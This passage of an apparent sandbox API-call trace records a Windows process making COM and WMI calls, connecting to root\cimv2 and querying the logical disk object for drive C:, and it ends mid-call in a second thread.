ppvObject=0x71ee10c*=0x0) returned 0x80004002 [0211.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee0bc | out: ppvObject=0x71ee0bc*=0x0) returned 0x80004002 [0211.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee0c8 | out: ppvObject=0x71ee0c8*=0x77db48) returned 0x0 [0211.884] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77db48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee0d0 | out: pCid=0x71ee0d0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0211.884] WbemDefPath:IUnknown:Release (This=0x77db48) returned 0x3 [0211.884] CoGetContextToken (in: pToken=0x71ee128 | out: pToken=0x71ee128) returned 0x0 [0211.884] CoGetContextToken (in: pToken=0x71ee530 | out: pToken=0x71ee530) returned 0x0 [0211.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee5c0 | out: ppvObject=0x71ee5c0*=0x0) returned 0x80004002 [0211.885] WbemDefPath:IUnknown:Release (This=0x6738cb0) returned 0x2 [0211.885] WbemDefPath:IUnknown:Release (This=0x6738cb0) returned 0x1 [0211.885] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0211.885] CoGetContextToken (in: pToken=0x71eee18 | out: pToken=0x71eee18) returned 0x0 [0211.885] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x71eeee8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eeee4 | out: ppvObject=0x71eeee4*=0x6738cb0) returned 0x0 [0211.885] WbemDefPath:IUnknown:AddRef (This=0x6738cb0) returned 0x3 [0211.885] WbemDefPath:IUnknown:Release (This=0x6738cb0) returned 0x2 [0211.885] WbemDefPath:IWbemPath:SetText (This=0x6738cb0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738cb0, puCount=0x71ef06c | out: puCount=0x71ef06c*=0x0) returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x71ef068*=0x0, pszText=0x0 | out: puBuffLength=0x71ef068*=0x20, pszText=0x0) returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x71ef068*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef068*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738cb0, uRequestedInfo=0x0, puResponse=0x71ef074 | out: puResponse=0x71ef074*=0xc19) returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738cb0, puCount=0x71ef06c | out: puCount=0x71ef06c*=0x0) returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738cb0, uRequestedInfo=0x0, puResponse=0x71ef074 | out: puResponse=0x71ef074*=0xc19) returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738cb0, uRequestedInfo=0x0, puResponse=0x71ef074 | out: puResponse=0x71ef074*=0xc19) returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738cb0, puCount=0x71eefec | out: puCount=0x71eefec*=0x0) returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71eefd8 | out: puCount=0x71eefd8*=0x2) returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71eefd4*=0x0, pszText=0x0 | out: puBuffLength=0x71eefd4*=0xf, pszText=0x0) returned 0x0 [0211.885] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71eefd4*=0xf, pszText="00000000000000" | out: puBuffLength=0x71eefd4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.885] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eef88 | out: ppv=0x71eef88*=0x72015c) returned 0x0 [0211.885] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71eef80 | out: pAptType=0x71eef80*=1) returned 0x0 [0211.885] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71eef84 | out: ppvObject=0x71eef84*=0x0) returned 0x80004002 [0211.885] IUnknown:Release (This=0x72015c) returned 0x1 [0211.886] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ee8f0 | out: ppv=0x71ee8f0*=0x6736ed8) returned 0x0 [0211.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ed8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eeb08 | out: ppvObject=0x71eeb08*=0x0) returned 0x80004002 [0211.886] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ed8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb1c | out: ppvObject=0x71eeb1c*=0x6738d20) returned 0x0 [0211.886] WbemDefPath:IUnknown:Release (This=0x6736ed8) returned 0x0 [0211.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee73c | out: ppvObject=0x71ee73c*=0x6738d20) returned 0x0 [0211.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee6f8 | out: ppvObject=0x71ee6f8*=0x0) returned 0x80004002 [0211.887] WbemDefPath:IUnknown:AddRef (This=0x6738d20) returned 0x3 [0211.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee054 | out: ppvObject=0x71ee054*=0x0) returned 0x80004002 [0211.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee004 | out: ppvObject=0x71ee004*=0x0) returned 0x80004002 [0211.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee010 | out: ppvObject=0x71ee010*=0x77dcb8) returned 0x0 [0211.887] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dcb8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee018 | out: pCid=0x71ee018*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0211.887] WbemDefPath:IUnknown:Release (This=0x77dcb8) returned 0x3 [0211.887] CoGetContextToken (in: pToken=0x71ee070 | out: pToken=0x71ee070) returned 0x0 [0211.887] CoGetContextToken (in: pToken=0x71ee478 | out: pToken=0x71ee478) returned 0x0 [0211.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee508 | out: ppvObject=0x71ee508*=0x0) returned 0x80004002 [0211.887] WbemDefPath:IUnknown:Release (This=0x6738d20) returned 0x2 [0211.887] WbemDefPath:IUnknown:Release (This=0x6738d20) returned 0x1 [0211.887] CoGetContextToken (in: pToken=0x71eee00 | out: pToken=0x71eee00) returned 0x0 [0211.887] CoGetContextToken (in: pToken=0x71eed60 | out: pToken=0x71eed60) returned 0x0 [0211.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x71eee30*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eee2c | out: ppvObject=0x71eee2c*=0x6738d20) returned 0x0 [0211.887] WbemDefPath:IUnknown:AddRef (This=0x6738d20) returned 0x3 [0211.887] WbemDefPath:IUnknown:Release (This=0x6738d20) returned 0x2 [0211.887] WbemDefPath:IWbemPath:SetText (This=0x6738d20, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0211.887] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738d20, puCount=0x71eefb0 | out: puCount=0x71eefb0*=0x2) returned 0x0 [0211.887] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=4, puBuffLength=0x71eefac*=0x0, pszText=0x0 | out: puBuffLength=0x71eefac*=0xf, pszText=0x0) returned 0x0 [0211.887] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=4, puBuffLength=0x71eefac*=0xf, pszText="00000000000000" | out: puBuffLength=0x71eefac*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.887] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eefb0 | out: ppv=0x71eefb0*=0x72015c) returned 0x0 [0211.887] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71eefa8 | out: pAptType=0x71eefa8*=1) returned 0x0 [0211.888] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71eefac | out: ppvObject=0x71eefac*=0x0) returned 0x80004002 [0211.888] IUnknown:Release (This=0x72015c) returned 0x1 [0211.888] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eebd0 | out: ppv=0x71eebd0*=0x673d060) returned 0x0 [0211.888] WbemLocator:IUnknown:QueryInterface (in: This=0x673d060, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eede8 | out: ppvObject=0x71eede8*=0x0) returned 0x80004002 [0211.888] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d060, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eedfc | out: ppvObject=0x71eedfc*=0x6736f48) returned 0x0 [0211.888] WbemLocator:IUnknown:Release (This=0x673d060) returned 0x0 [0211.888] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eea1c | out: ppvObject=0x71eea1c*=0x6736f48) returned 0x0 [0211.889] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee9d8 | out: ppvObject=0x71ee9d8*=0x0) returned 0x80004002 [0211.889] WbemLocator:IUnknown:AddRef (This=0x6736f48) returned 0x3 [0211.889] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee334 | out: ppvObject=0x71ee334*=0x0) returned 0x80004002 [0211.889] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee2e4 | out: ppvObject=0x71ee2e4*=0x0) returned 0x80004002 [0211.889] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee2f0 | out: ppvObject=0x71ee2f0*=0x0) returned 0x80004002 [0211.889] CoGetContextToken (in: pToken=0x71ee350 | out: pToken=0x71ee350) returned 0x0 [0211.889] CoGetContextToken (in: pToken=0x71ee758 | out: pToken=0x71ee758) returned 0x0 [0211.889] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee7e8 | out: ppvObject=0x71ee7e8*=0x0) returned 0x80004002 [0211.889] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x2 [0211.889] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x1 [0211.889] CoGetContextToken (in: pToken=0x71eedc8 | out: pToken=0x71eedc8) returned 0x0 [0211.889] CoGetContextToken (in: pToken=0x71eed28 | out: pToken=0x71eed28) returned 0x0 [0211.889] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f48, riid=0x71eedf8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eedf4 | out: ppvObject=0x71eedf4*=0x6736f48) returned 0x0 [0211.889] WbemLocator:IUnknown:AddRef (This=0x6736f48) returned 0x3 [0211.889] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x2 [0211.890] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738d20, puCount=0x71eef8c | out: puCount=0x71eef8c*=0x2) returned 0x0 [0211.890] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=8, puBuffLength=0x71eef88*=0x0, pszText=0x0 | out: puBuffLength=0x71eef88*=0xf, pszText=0x0) returned 0x0 [0211.890] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=8, puBuffLength=0x71eef88*=0xf, pszText="00000000000000" | out: puBuffLength=0x71eef88*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.890] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eee64 | out: ppv=0x71eee64*=0x6736df8) returned 0x0 [0211.890] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736df8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71eeef8 | out: ppNamespace=0x71eeef8*=0x6747f4c) returned 0x0 [0216.719] WbemLocator:IUnknown:QueryInterface (in: This=0x6747f4c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed94 | out: ppvObject=0x71eed94*=0x780fa4) returned 0x0 [0216.719] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780fa4, pProxy=0x6747f4c, pAuthnSvc=0x71eede4, pAuthzSvc=0x71eede0, pServerPrincName=0x71eedd8, pAuthnLevel=0x71eeddc, pImpLevel=0x71eedcc, pAuthInfo=0x71eedd0, pCapabilites=0x71eedd4 | out: pAuthnSvc=0x71eede4*=0xa, pAuthzSvc=0x71eede0*=0x0, pServerPrincName=0x71eedd8, pAuthnLevel=0x71eeddc*=0x6, pImpLevel=0x71eedcc*=0x2, pAuthInfo=0x71eedd0, pCapabilites=0x71eedd4*=0x1) returned 0x0 [0216.719] WbemLocator:IUnknown:Release (This=0x780fa4) returned 0x1 [0216.719] WbemLocator:IUnknown:QueryInterface (in: This=0x6747f4c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed88 | out: ppvObject=0x71eed88*=0x780fc4) returned 0x0 [0216.719] WbemLocator:IUnknown:QueryInterface (in: This=0x6747f4c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed84 | out: ppvObject=0x71eed84*=0x780fa4) returned 0x0 [0216.719] WbemLocator:IClientSecurity:SetBlanket (This=0x780fa4, pProxy=0x6747f4c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.720] WbemLocator:IUnknown:Release (This=0x780fa4) returned 0x2 [0216.720] WbemLocator:IUnknown:Release (This=0x780fc4) returned 0x1 [0216.720] CoTaskMemFree (pv=0x77e118) [0216.720] WbemLocator:IUnknown:Release (This=0x6736df8) returned 0x0 [0216.720] WbemLocator:IUnknown:QueryInterface (in: This=0x6747f4c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee984 | out: ppvObject=0x71ee984*=0x780fc4) returned 0x0 [0216.720] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee940 | out: ppvObject=0x71ee940*=0x0) returned 0x80004002 [0216.726] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee75c | out: ppvObject=0x71ee75c*=0x0) returned 0x80004002 [0216.728] WbemLocator:IUnknown:AddRef (This=0x780fc4) returned 0x3 [0216.728] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0216.730] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee24c | out: ppvObject=0x71ee24c*=0x0) returned 0x80004002 [0216.733] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee258 | out: ppvObject=0x71ee258*=0x780f24) returned 0x0 [0216.733] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780f24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee260 | out: pCid=0x71ee260*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0216.733] WbemLocator:IUnknown:Release (This=0x780f24) returned 0x3 [0216.733] CoGetContextToken (in: pToken=0x71ee2b8 | out: pToken=0x71ee2b8) returned 0x0 [0216.733] CoGetContextToken (in: pToken=0x71ee6c0 | out: pToken=0x71ee6c0) returned 0x0 [0216.733] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee750 | out: ppvObject=0x71ee750*=0x780fac) returned 0x0 [0216.733] WbemLocator:IRpcOptions:Query (in: This=0x780fac, pPrx=0x780fc4, dwProperty=2, pdwValue=0x71ee778 | out: pdwValue=0x71ee778) returned 0x80004002 [0216.733] WbemLocator:IUnknown:Release (This=0x780fac) returned 0x3 [0216.733] WbemLocator:IUnknown:Release (This=0x780fc4) returned 0x2 [0216.733] CoGetContextToken (in: pToken=0x71eec98 | out: pToken=0x71eec98) returned 0x0 [0216.733] CoGetContextToken (in: pToken=0x71eebf8 | out: pToken=0x71eebf8) returned 0x0 [0216.733] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x71eecc8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eecc4 | out: ppvObject=0x71eecc4*=0x6747f4c) returned 0x0 [0216.733] WbemLocator:IUnknown:AddRef (This=0x6747f4c) returned 0x4 [0216.733] WbemLocator:IUnknown:Release (This=0x6747f4c) returned 0x3 [0216.733] WbemLocator:IUnknown:Release (This=0x6747f4c) returned 0x2 [0216.733] SysStringLen (param_1=0x0) returned 0x0 [0216.733] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738cb0, puCount=0x71ef05c | out: puCount=0x71ef05c*=0x0) returned 0x0 [0216.733] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x71ef058*=0x0, pszText=0x0 | out: puBuffLength=0x71ef058*=0x20, pszText=0x0) returned 0x0 [0216.733] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x71ef058*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef058*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.733] CoGetContextToken (in: pToken=0x71eecc8 | out: pToken=0x71eecc8) returned 0x0 [0216.734] WbemLocator:IUnknown:AddRef (This=0x780fc4) returned 0x3 [0216.734] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb5c | out: ppvObject=0x71eeb5c*=0x780fc4) returned 0x0 [0216.734] WbemLocator:IUnknown:Release (This=0x780fc4) returned 0x3 [0216.734] WbemLocator:IUnknown:Release (This=0x780fc4) returned 0x2 [0216.734] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x71ef060*=0x0, pszText=0x0 | out: puBuffLength=0x71ef060*=0x20, pszText=0x0) returned 0x0 [0216.734] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x71ef060*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef060*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.734] IWbemServices:GetObject (This=0x6747f4c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef014*=0x0, ppCallResult=0x0) Thread: id = 142 os_tid = 0xb1c [0136.564] SysReAllocStringLen (in: pbstr=0x761fad4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x761fad4*="KERNEL32.DLL") returned 1 [0136.564] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: 